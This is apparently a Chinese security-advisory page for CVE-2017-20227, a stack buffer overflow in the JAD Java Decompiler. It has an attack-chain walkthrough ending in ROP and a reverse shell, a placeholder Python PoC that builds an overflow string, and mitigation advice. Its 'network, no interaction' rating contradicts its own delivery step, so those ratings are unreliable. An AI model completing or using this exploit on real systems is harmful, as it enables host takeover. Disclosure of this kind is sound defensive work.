CVE-2017-20227 CVSS 9.8 严重

CVE-2017-20227 JAD Java Decompiler栈溢出漏洞

披露日期: 2026-03-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2017-20227

漏洞类型

栈缓冲区溢出

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

JAD Java Decompiler

漏洞概述

JAD Java Decompiler 1.5.8e-1kali1及之前版本存在严重的栈缓冲区溢出漏洞。攻击者通过向jad命令提交超长输入数据，可覆盖堆栈内存。该漏洞无需用户交互即可被利用，成功后允许攻击者在目标系统上执行任意代码，完全控制主机。

技术细节

该漏洞的根本原因在于JAD程序未对输入参数或文件名进行足够的长度校验，导致基于栈的缓冲区溢出。当处理超长字符串时，数据溢出固定大小的栈缓冲区，覆盖返回地址。攻击者通过精心构造恶意输入，利用返回导向编程（ROP）技术绕过安全防御机制（如ASLR和DEP），劫持程序执行流并加载Shellcode，最终获取系统Shell权限。

攻击链分析

STEP 1

侦察

攻击者确认目标系统上安装了JAD Java Decompiler 1.5.8e-1kali1或更早版本。

STEP 2

武器化

攻击者编写特定的恶意输入字符串，包含用于覆盖返回地址的偏移量和用于绕过保护机制的ROP链。

STEP 3

传递

攻击者诱导用户使用JAD处理恶意文件，或在自动化脚本中传入超长参数。

STEP 4

利用

执行JAD命令，输入数据超出缓冲区边界，触发栈溢出，覆盖返回地址。

STEP 5

安装与执行

程序跳转到ROP链执行系统调用，最终反弹Shell或执行任意命令，获取系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python
# PoC for CVE-2017-20227 (JAD Stack Buffer Overflow)
# This script generates a malicious file to trigger the overflow.

import struct

# Offset to overwrite EIP (Example value, adjust based on specific binary analysis)
offset = 412

# ROP chain to spawn shell (Example placeholders)
rop_chain = "A" * offset
rop_chain += struct.pack('<I', 0xdeadbeef) # Overwrite EIP with gadget address
rop_chain += "C" * 100  # Padding / Shellcode placeholder

# Create a malicious .class file with a long name or pass argument
# Assuming the crash happens via command line argument
payload = rop_chain

print("[+] Generating payload...")
print("[+] Payload length: {}".format(len(payload)))

# Command to simulate crash (requires vulnerable jad binary)
# print("Usage: jad " + payload)

影响范围

JAD Java Decompiler <= 1.5.8e-1kali1

防御指南

临时缓解措施

目前官方尚未发布修复补丁。建议用户立即停止使用该版本的JAD工具，并切换到其他维护中的Java反编译器。如果必须使用，请确保不要对来源不明的文件进行反编译操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表